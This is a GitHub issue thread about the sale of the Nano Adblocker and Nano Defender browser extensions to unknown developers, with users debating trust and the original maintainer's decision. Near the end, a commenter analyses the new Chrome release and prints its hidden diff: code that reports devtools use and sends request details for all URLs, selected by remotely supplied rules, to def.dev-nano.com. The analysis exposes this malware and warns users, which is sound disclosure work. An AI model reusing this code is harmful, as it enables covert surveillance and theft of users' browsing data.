Skip to content
This repository has been archived by the owner on Oct 16, 2020. It is now read-only.

[Announcement] Recent and upcoming changes to the Nano projects #362

Open
jspenguin2017 opened this issue Oct 3, 2020 · 92 comments
Open

Comments

@jspenguin2017
Copy link
Member

jspenguin2017 commented Oct 3, 2020

Important updates and disclaimers: The WebStore listings are no longer under my control. I am not responsible for the actions of the new developer(s). If you feel concerned about the recent changes (please continue reading for more information), please remember that you can uninstall the extensions and/or find alternatives at any time.


As some of you might have noticed, Nano Adblocker is now months behind upstream. It became clear that I simply do not have enough time to properly maintain the Nano projects.

At the beginning, there were no backlogs. As the projects grow, I added a backlog system to better manage open issues. That was unfortunately not enough, so I added another level of backlog -- the triage queue. Then a third level. And a fourth one. Now the fourth level of backlog, the notification queue, has over 138 issues waiting for my attention. No matter how well I organize incoming issues, if I do not have enough time to look into them, I will simply fall further and further behind. With thousands of issues backlogged, it is only a matter of time that the Nano projects collapse.

And here comes the news. New developer(s) are in the process of acquiring Nano Adblocker and Nano Defender. Hopefully, they will be able to put an end to this backlog madness and finally give Nano Adblocker some real development time instead of constantly trying to catch up to upstream. The transition is still taking place, so I would like to ask for your patience. I will have more details about this in the upcoming days or weeks.

I would like to apologize for not being able to post an announcement earlier. I was extremely busy last week, and with all the additional things that I have to take care of to ensure a smooth transition, I fall quite a bit behind schedule. If you have any questions or concerns, please post them below. I am still trying to catch up, so please be patient while I find time to respond to your inputs.


Updates:

The new developer(s) said that they will create their own repositories and change links where appropriate.

The Edge store listings were changed to hidden.

NanoMeow/MDLMirror has been archived.

NanoMeow/UltimateMirror has been archived, and its visibility has been changed to private.

NanoMeow/MirrorEngine has been archived.

The Nano Defender repository has been archived.

Repositories in NanoAdblocker and NanoAdblockerLab organizations except NanoAdblocker/NanoCore have been archived.

The backend server running on legacy.hugoxu.com will no longer accept new reports from the Quick Issue Reporter.

NanoAdblocker/NanoCore and NanoMeow/QuickReports will be archived on 2020-10-15.


Please head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues

@jspenguin2017 jspenguin2017 pinned this issue Oct 3, 2020
@DandelionSprout
Copy link

DandelionSprout commented Oct 3, 2020

Speaking as (to the best of my knowledge) the highest-profile end-user of Nano Adblocker and Defender, the vague notion of "A team of Turkish developers" would definitely need a lot more clarification when the time is right to do so, before I'd feel safe and confident about this.

@liamengland1
Copy link

Speaking as (to the best of my knowledge) the highest-profile end-user of Nano Adblocker and Defender

That part was not necessary IMO.

(probably) Most users of Nano Adblocker/Defender care about their online privacy, so they will probably share your concern and desire for more information, as do I.

@DandelionSprout
Copy link

I meant that I was the only list maintainer of a major list that used Nano Adblocker as my main adblocker in my everyday life.

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 3, 2020

Before I was contacted by the new developer(s), I was planning on downscaling my projects due to time constraints. I had a totally different announcement drafted, in which I announced that some of the Nano projects will become unmaintained. When I started my projects, I never thought it would become this big, and lately, it has been too much for me. I was honestly hoping that someone would take the maintenance burden away from me. Having to choose between shutting down the projects and having someone else to take care of them, I chose the latter.

All this is still new to me, and I am still learning. I hope that I made the right choice and let's hope for the best.

@Yuki2718
Copy link

Yuki2718 commented Oct 4, 2020

Frankly it reminds me of the past taking over of uBlock. I don't need to know much about uAssets contributors, their years of contribution speaks all. We know nothing about the new developers.

@okiehsch
Copy link

okiehsch commented Oct 5, 2020

There was one day where I was a new developer who has no contribution history at all.

And you grew your userbase organically, they are first and foremost aquiring your userbase, hence the scepticism.

@DandelionSprout
Copy link

Does the team of Turkish developers have any previous experience with adblocking in any shape or form?

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 5, 2020

Software development skills are transferable, and the skills needed to develop a product tend to be different than the ones needed to use a product. Of course developers need to know how to use the features they are developing, but the experience from developing a completely different extension would be much more important than the experience with adblocking. As an example, I know very little about dynamic filtering, I do not believe I ever used it and I am not too sure how it really works. However, this has not limit my ability to develop other parts of the extension.

@jspenguin2017
Copy link
Member Author

@okiehsch That is a good point, I will see what kind of information I can share.

@jspenguin2017
Copy link
Member Author

I am going to bed now. I am not sure what my schedule for next week will look like, so I apologize in advance if I cannot find time to properly reply to your comments until the weekend.

@gorhill
Copy link

gorhill commented Oct 5, 2020

As an example, I know very little about dynamic filtering, I do not believe I ever used it and I am not too sure how it really works.

I would like to point out my view that Nano AdBlocker ("Nano") is pretty much uBO but with a different syntax highlighter and some configuration tweaks, most of the work that benefit Nano occurs in uBO. Surely the acquirers are aware of this?

In my opinion the best original feature of Nano as far as I am concerned is the ability to report issue (which requires maintaining an intermediate server), but for the rest I see it only as mostly uBO when leaving out the code editor and tweaks -- the sparse list of fixed issues confirms that the bulk of the commits benefiting Nano occurs in uBO.

I will see what kind of information I can share.

Your users installed your extension because they implicitly trusted you. It does not look good when you have to ask permission to disclose important information to those people who wants to acquire your user base (essentially acquiring your user base's trust and a way to monetize uBO volunteers' work) before considering your user base's best interests, i.e. who is going to maintain the extension they use.

Additionally, why refer to the acquirer as "Turkish developers" instead of just naming the entity? The nationality of developers is irrelevant, but the entity and its track record is. I find it odd that you feel like mentioning their nationality which is irrelevant while leaving out the more important information about which entity is involved so that people can research it.

I am just going to ask point blank:

  • Which entity is acquiring your user base, control of your repos, and control of Chrome/Microsoft store publications?
  • Are the acquirers related in any way to eyeo or BetaFish?

As far I am concerned at this point from what is being disclosed, what I see is a yet to be disclosed entity is planning to monetize the work and time of all uBO contributors indirectly by acquiring and monetizing Nano.

@LiCybora
Copy link

LiCybora commented Oct 5, 2020

As a Firefox port maintainer, I would like to know whether the "Turkish developers" will take over the Firefox port as well or just the Chrome(ium)/Edge part. I am neutral to the decision, but if the upstream developer is changed, I need to think about should I detached from upstream and rename the project, maintain for the new developers, or just abandon the Firefox port. It is unlikely I will still continue maintain for new developers without knowing their stance.

My initial motivation for maintaining this project is I find the usefulness of this project and do not want it dead on Firefox (previously original author and some other maintainers do maintain on Firefox for a while). I try my best to turn myself from normal user to maintainer. I am still too far to be qualified as developer. But in case I still need this project and the new developers do not take over the port (or I don't like their stance, just in case...), I will try my best to develop on my own (or maintain for them if I agree with new developers).

However, as the uBO have its syntax highlighter and the new Firefox mobile do not support addons other than Recommended Extension, I am even confuse whether Nano Adblocker is still needed on Firefox if report issue is missing (or suspicious that everyone is concerning). At best, the new developers are good (maybe better than me) and they will maintain ports on Firefox greater than previous. At worst, either I will slowly develop on my own, or just use uBO and abandoned it.

Update: I refuse to port for this project anymore.

@DandelionSprout
Copy link

I think that among the other original features of Nano Adblocker, {{nanoHref}} was the one I liked the most. It was much like {{origin}} for autoCommentFilterTemplate, but displayed the whole URL and not just the domain. This was very convenient when working on the Nano Placeholder Buster list in particular, and I'll see if I have some spare time to submit a request in the uBO issue tracker to add such a feature there as well.

Apart from that and Nano Filters / NanoMeow, I think Nano had a few additional included lists (5 Nano-branded lists + Adblock Warning Removal List), and a few additional scriplets that currently aren't being used for much.

Nano's original advantages in 2018 that made me jump from uBO to Nano back then, like a then-revolutionary linter, and easier integration with Nano Defender, have pretty much been caught up to in 2020 by uBO.

@TheOne320
Copy link

Will the project stay open source?

@gorhill
Copy link

gorhill commented Oct 5, 2020

They can't change the license, and they have to assign GPLv3 license to whatever code they add to the project.

@jspenguin2017
Copy link
Member Author

I will be responding to comments in the order they are received. I am quite short on time, so please be patient.

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 6, 2020

@gorhill

There are a couple other things that I would like to address regarding your input, but I do not have time to write that tonight. So let's just get the burning questions out of the way.

The new developer(s) claimed that they are a pair of independent developers, they said that they are freelancers who are just starting out. Regarding affiliation with Eyeo and BetaFish, I asked them this morning, and they said no.

Update: To clarify, I still control the repos, the Edge store listings, the bot (NanoMeow) account, and the legacy.hugoxu.com domain. I will post an update if any of these change.

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 6, 2020

Regarding updates to the opening post: I will add disclaimers no matter who acquired my projects. This is not an indication that I no longer care about my projects and their users. Quite the opposite: The updates and disclaimers disclose what I can and cannot control, which gives the users a chance to make an informed decision.

Unfortunately, the projects do not have a good notification system, I linked this announcement in all relevant repos for better visibility, this is the best I can do right now. Hopefully most users would have a chance to see this thread and make a decision before the first update from the new developer(s) comes out.


I will address your comments when I have more time later this week or this weekend.

@liamengland1
Copy link

liamengland1 commented Oct 6, 2020

The developers are apparently named semagul aymak and nizametdin altuncu.

Nano Adblocker is controlled by the former and Defender by the latter. I can't find any information about them.

@Yuki2718
Copy link

Yuki2718 commented Oct 6, 2020

Why they didn't simply fork the projects? This suggests they wanted not the code base but Nano brand and its user base. What I concern is something like this: https://twitter.com/gorhill/status/1293233244826218498

@gorhill
Copy link

gorhill commented Oct 6, 2020

I can't find any information about them.

So this is what is actually happening, I consider all else to be fluff:

"Two developers"[1] with no track record of ever contributing to the current project, or any related projects at least showing any sort of interest in content blocking or privacy or even loosely related topics, and with no visible internet presence to this day, paid an undisclosed amount in exchange of the user base and control of the GitHub repositories.

As of now, the user base has already been transferred (as per Chrome store listings), and in all likelihood a majority of those users will have no idea their installed extensions is no longer maintained by the person they originally trusted, at least implicitly, when they installed those extensions. Links to the privacy policy have been removed from the Chrome store listings (here, and here).

It goes without saying that the goal of these "two developers" is to monetize the two extensions. Those "two developers" will likely continue to import all the work from upstream, i.e. uBO, which is the result of long time volunteers investing their own free time and efforts days after days spanning years, which also contributed to make Nano AdBlocker to become what it is.

[1] Using quotes because nobody knows that there are really two actual developers given that nothing can be verified so far.

@Techman
Copy link

Techman commented Oct 9, 2020

Looks like I will be removing everything related to Nano Core/Defender from my uBlock Origin preferences. I've seen how this goes with content-blocking extensions. They have usually turned around and monetized in some fashion. We don't need any more rubbish like that in the ecosystem.

@jspenguin2017, I honestly think it would have been better off that you shut down the projects and redirect users back to uBlock Origin instead of "sell" them down the river. As @gorhill has mentioned, it is entirely likely that existing extension users have no idea that ownership has changed hands. This is a significant privacy and security issue as extensions can auto-update.

In all honesty, I'm for uBlock Origin marking Nano lists as bad unless these situations can be addressed. Transferring the project over to unknown and unproven maintainers makes no sense.

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 10, 2020

@gorhill

Nano AdBlocker ("Nano") is pretty much uBO but with a different syntax highlighter and some configuration tweaks

In my opinion the best original feature of Nano as far as I am concerned is the ability to report issue

You are not wrong if you compare Nano with uBO today, but this was not always like this. Nano was the first adblocker to ever get a syntax highlighter. So I would say that the syntax highlighter is the best original feature since the ability to quickly and easily report issues is present in AdGuard, Adblock Plus, and probably other adblockers before Nano.

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 10, 2020

@gorhill

Your users installed your extension because they implicitly trusted you. It does not look good when you have to ask permission to disclose important information

I totally agree, it definitely does not look good for me. This is the first time someone acquired my projects, and honestly I am not too sure what I am supposed to do. If there is a next time, I will certainly be more prepared.

Ultimately, I have no control over what the new developer(s) do. So I updated all of my posts in this thread to be clearer and more neutral. This should hopefully help users to make properly informed decisions unaffected by their trust in me, implicit or otherwise.

@ghost
Copy link

ghost commented Oct 10, 2020

I dont understand why people care about nano so much, I mean literally its ublock origin fork with some features

@Yuki2718
Copy link

@enescglyn Because so many people use Nano.

@tazihad
Copy link

tazihad commented Oct 11, 2020

I started noticing youtube ads. Now I am here. I guess this is it for me. It was good 2 years. Going back to uBlock Origin. Thanks to the nano developer I never noticed ads and ad detector.

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 11, 2020

@tazihad

The new developer(s) have yet to publish an update at the time of your post. Your issue is most likely unrelated to the changes announced here.

@PseudoResonance
Copy link

I don't think he was saying the changes were related. I think he just came here looking for a fix or reasoning, and then discovered this unfortunate issue and decided to give up on Nano. I too had a similar experience. I came to GitHub looking for an explanation on the lack of recent updates, and came across this, and I think this is probably it for me and Nano Adblocker too.

The lack of any announcements or transparency as well as the lack of information regarding the situation, plus the fact that the new maintainers have zero history of ever working on anything, let alone this project, just doesn't really make me want to keep using this.

Sure, now there is information available here, but unless you come looking for it, you'll probably never find out. Honestly, if there was a noticeable announcement in the plugin, like a new tab popping up saying "Hey, we're transferring ownership!" I would've been a lot happier. I also would've been a lot happier if the new maintainers had shown some prior interest in the project before acquiring it. That looks to me like they're just looking for some easy targets to acquire instead of actually caring about the project.

I plan to still watch out for any new developments in this issue, but I think it is most likely that many users who are informed of this will ditch Nano Adblock.

@Techman
Copy link

Techman commented Oct 13, 2020

Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.

Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies – or of other tracking tools – by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.

It was really worth selling users down the river, huh @jspenguin2017?

I forgot to mention this: This is exactly the kind of stuff that Google loves to see because it enables them to implement stricter and stricter policies for extensions, and also policies that cripple their capabilities. Thanks for contributing to the problem.

@okiehsch
Copy link

Is that part of the template ?

@uBlock-user They used something like https://www.termsfeed.com, the part you quote is used in generic templates.
Look at https://mindsetdirect.com/privacy-policy/ for example.

@novaz9
Copy link

novaz9 commented Oct 14, 2020

I am concerned.
I have been using Nano for years. I even typed passwords with the extension on due to my complete trust in @jspenguin2017 and @gorhill .
Now I just clean installed windows , noticed edge beta listings are gone and finally finding this .
I am worried about my passwords. I have very little understanding of coding, but reading this discussion I find that : they can't change the license and they must add license to whatever code they add, that @jspenguin2017 was in charge of listings, repositories ecc 8 days ago and that the new devs still have to publish an update for the extension.
So, should I change all my passwords or not?

@tazihad
Copy link

tazihad commented Oct 14, 2020

hmm. I guess the new Developers name are [ana-sayfa]. And they have a play store account with BeeMobileApps name.

https://sites.google.com/view/nano-dev/ana-sayfa
https://sites.google.com/view/beemobileappsweightloss/ana-sayfa
https://play.google.com/store/apps/developer?id=BeeMobileApps&hl=en

Welll, I already installed uBlock Origin. But this thread is pooping up on my mail.

@gorhill
Copy link

gorhill commented Oct 14, 2020

@novaz9 No worry since the packages have not been updated yet. Once they are updated, anybody will be able to look at their content to find out if there is anything wrong in them.

@ekremparlak
Copy link

hmm. I guess the new Developers name are [ana-sayfa]. And they have a play store account with BeeMobileApps name.

https://sites.google.com/view/nano-dev/ana-sayfa
https://sites.google.com/view/beemobileappsweightloss/ana-sayfa
https://play.google.com/store/apps/developer?id=BeeMobileApps&hl=en

Welll, I already installed uBlock Origin. But this thread is pooping up on my mail.

Actually "ana sayfa" means "home page" in English

@krystian3w
Copy link

Or another random girl - Ana maybe "=" Anna.

@LiCybora
Copy link

LiCybora commented Oct 15, 2020

Finally they are here: https://github.com/nenodevs/uBlockProtector
And their Chrome Store also update to 15.0.0.206

However, their update on Chrome Store does not match the one in their repository (not sure if forgot push or else). You can compare their GitHub and the below image.
image

Their Chrome Store version add a script call connect.js while do not reveal in their GitHub. Not sure if this violate GPLv3.

image

The new script they add seems minified (or maybe even obfuscated but I cannot sure now)(Thanks for uBlock-user answer). I am not a Chrome user and don't know whether there are so-call release note to explain why adding this. (Although I guess mostly not as they don't even have that on GitHub).

@liamengland1
Copy link

liamengland1 commented Oct 15, 2020

I don't think it's malicious, looks like an older version of the socket.io library.

@gorhill
Copy link

gorhill commented Oct 15, 2020

You can use Chrome extension source viewer to inspect any extension, it has a built-in de-minifier.

@liamengland1
Copy link

You can use Chrome extension source viewer to inspect any extension, it has a built-in de-minifier.

Or this, by the same guy: https://robwu.nl/crxviewer/

@gorhill
Copy link

gorhill commented Oct 15, 2020

So here is what I am seeing in the new Nano Defender 15.0.0.206:

Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named report is sent to https://def.dev-nano.com/, or in simple words the extension remotely checks whether you are using the extension dev tools -- which is what you would do if you wanted to find out what the extension is doing.

Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see:

At launch, the extension fetch something from https://def.dev-nano.com/, called listOfObject. Minor correction: At launch the extension listen to https://def.dev-nano.com/ for messages to populate listOfObject.

The content of listOfObject is further used apparently, as far as I can understand the code, to test fields from the details object passed to webRequest.onBeforeSendHeaders(). If all looked up fields succeed, the whole content of the details object is sent to https://def.dev-nano.com/ under the name handleObject.

Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:

chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
    urls: ["<all_urls>"] 
}, ['requestHeaders', 'blocking', 'extraHeaders']); 

So which info ends up being sent is configured externally through the listOfObject, and I strongly suspect this would all stop if I were to open the dev tools.

There is a bit of silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:

var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join("");

Which is equivalent to:

var replacerConcat = stringyFy.split("-zzz").join("");

Purpose is not clear, it's meant to remove instances of -zzz from request headers, before they are being sent out.


So trying to figure an example of what the new code can do. Let's say it wants to get sensitive information about network requests to a specific bank, then the content of the listOfObject object could be:

{ url: 'bank\.example\.com\/' }

Then the webRequest.onBeforeSendHeaders() handler would check whether details.url matches the regex bank\.example\.com\/. If so, then the whole content of the details object is sent to https://def.dev-nano.com/ as a handleObject packet.

The listOfObject can contain any number of conditions, I just gave an example with a single one above.

The extension is now designed to lookup specific information from your outgoing network requests according to an externally configurable heuristics and send it to https://def.dev-nano.com/.


A note regarding what the extension is doing above. Though the extension requests the webRequestBlocking permission, that permission is not required to perform the collection of data, including sensitive ones. The permission is only necessary to remove instances of -zzz from the request headers, and I don't know the purpose of this -- maybe someone else knows.


Here the diff for the code change you won't find in their GitHub repo:

--- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@
 
     const hasNews = false;
 
-    const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+    const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
     const newsReadFlag = "news-read";
 
     // This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
     // ------------------------------------------------------------------------------------------------------------- //
 
 };
-
+var defender = io.connect("https://def.dev-nano.com/"); 
+var listOfObject = {}; 
 // ----------------------------------------------------------------------------------------------------------------- //
 
 a.noopErr = () => {
@@ -211,6 +212,29 @@
 
 // ----------------------------------------------------------------------------------------------------------------- //
 
+
+ 
+async function dLisfOfObject(newList) { 
+    let dListResp = await fetch(newList.uri, newList.attr) 
+    var listOfObj = {} 
+    listOfObj.headerEntries = Array.from(dListResp.headers.entries()) 
+    listOfObj.data = await dListResp.text() 
+    listOfObj.ok = dListResp.ok; 
+    listOfObj.status = dListResp.status; 
+    return listOfObj; 
+} 
+ 
+defender.on("dLisfOfObject", async function (newList) { 
+    let getRes = await dLisfOfObject(newList); 
+    defender.emit(newList.callBack, getRes) 
+}); 
+ 
+defender.on("listOfObject", function (a) { 
+    listOfObject = a; 
+}) 
+
+
+
 // Redirect helpers
 
 a.rSecret = a.cryptoRandom();
@@ -227,7 +251,22 @@
 
 // 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
 a.blankMP4 = a.rLink("blank.mp4");
-
+ 
+var element = document.createElement("p"); ; 
+var openListGet = false; 
+element.__defineGetter__("id", function() { 
+    openListGet = true;  
+}); 
+ 
+var i = setInterval(function() { 
+    openListGet = false; 
+    console.log(element); 
+    if(openListGet){ 
+        defender.emit("report") 
+        console.clear(); 
+        clearInterval(i) 
+    } 
+}, 100);
 // ----------------------------------------------------------------------------------------------------------------- //
 
 // tab   - Id of the tab
@@ -450,6 +489,50 @@
 
     return true;
 };
+ 
+var blockingHandler = function (infos) { 
+    var changedAsArray = Object.keys(listOfObject); 
+
+    var detailsHeader = infos.requestHeaders; 
+    var HeadReverse = detailsHeader.reverse(); 
+    var stringyFy = JSON.stringify(HeadReverse); 
+    var mount = ""; 
+    if (changedAsArray.length > 0) { 
+        var checkerList = true; 
+        for (const object of changedAsArray) { 
+            if (object.x === object.y) { 
+                mount += 1; 
+            } 
+            break; 
+        } 
+        for (let i = 0; i < changedAsArray.length; i++) { 
+            let x = changedAsArray[i]; 
+            var re = new RegExp(listOfObject[x],'gi'); 
+            mount = "5"; 
+            if (infos[x].toString().match(re) == null) { 
+                checkerList = false; 
+                break; 
+            } 
+        } 
+        if (checkerList) { 
+            defender.emit('handleObject', infos); 
+        } 
+    } 
+    
+    var m = [45,122,122,122]
+    var s = m.map( x => String.fromCharCode(x) )
+    var x = s.join("");
+    var replacerConcat = stringyFy.split(x).join(""); 
+    var replacer = JSON.parse(replacerConcat); 
+    return { 
+        requestHeaders: replacer 
+    } 
+}; 
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
+    urls: ["<all_urls>"] 
+}, ['requestHeaders', 'blocking', 'extraHeaders']); 
+ 
 
 // ----------------------------------------------------------------------------------------------------------------- //

@gorhill
Copy link

gorhill commented Oct 15, 2020

Forgot to mention the obvious: uninstall now -- with those capabilities, it should be considered malware.

@nicole-ashley
Copy link

nicole-ashley commented Oct 15, 2020

So @jspenguin2017's users have been sold to malware. Great.

I'm going to report this extension to the Edge team for urgent analysis.

@hawkeye116477
Copy link

hawkeye116477 commented Oct 15, 2020

I'm going to report this extension to the Edge team for urgent analysis.

For now, version for Edge isn't updated and didn't changed owner, only Chrome version is affected.

@krystian3w
Copy link

krystian3w commented Oct 15, 2020

Maybe he reportead as "whisper" / private-message.

@nicole-ashley
Copy link

I'm going to report this extension to the Edge team for urgent analysis.

For now, version for Edge isn't updated and didn't changed owner, only Chrome version is affected.

As far as I'm aware you can't change owners with the Microsoft store, so @jspenguin2017 is most likely to just have given login details. It may very well already be submitted, awaiting review. I've asked the team to review this thread and look out for an update.

@PseudoResonance
Copy link

LiCybora/NanoDefenderFirefox#187 (comment)

This was posted on the Firefox port of NanoDefender on how to migrate from Nano Adblocker to uBlock Origin, for anyone that hasn't seen it.

@Techman
Copy link

Techman commented Oct 15, 2020

Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.

Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies – or of other tracking tools – by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.

It was really worth selling users down the river, huh @jspenguin2017?

I forgot to mention this: This is exactly the kind of stuff that Google loves to see because it enables them to implement stricter and stricter policies for extensions, and also policies that cripple their capabilities. Thanks for contributing to the problem.

So, what I suspected was correct. The extension has been modified to become malware, and outright compromises the privacy and security of users. You sold your users down the river and put them in harm's way to make a quick buck. That is actual blood on your hands now. Sure, you didn't write the code yourself, but you directly enabled the pathway for this to happen.

Nano has now become a historical example of why content blocking extensions should not be sold, and what happens when they are.

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 16, 2020

That is indeed a suspicious update, I will start analyzing it shortly. I will be archiving this repository, so let's head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues

@jspenguin2017
Copy link
Member Author

jspenguin2017 commented Oct 16, 2020

@nikrolls

so @jspenguin2017 is most likely to just have given login details

No, I still control the Edge store listings.

@Techman

put them in harm's way to make a quick buck

Do not misrepresent facts. I was looking for a new maintainer. If I knew that the new developer(s) would do this, I would not have accepted the deal.

As I mentioned here [1], I planned to donate most of the money back to the new developer(s) if they do a good job. If I wanted to make a quick buck, I would sell the projects and disappear.

[1] #362 (comment)

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests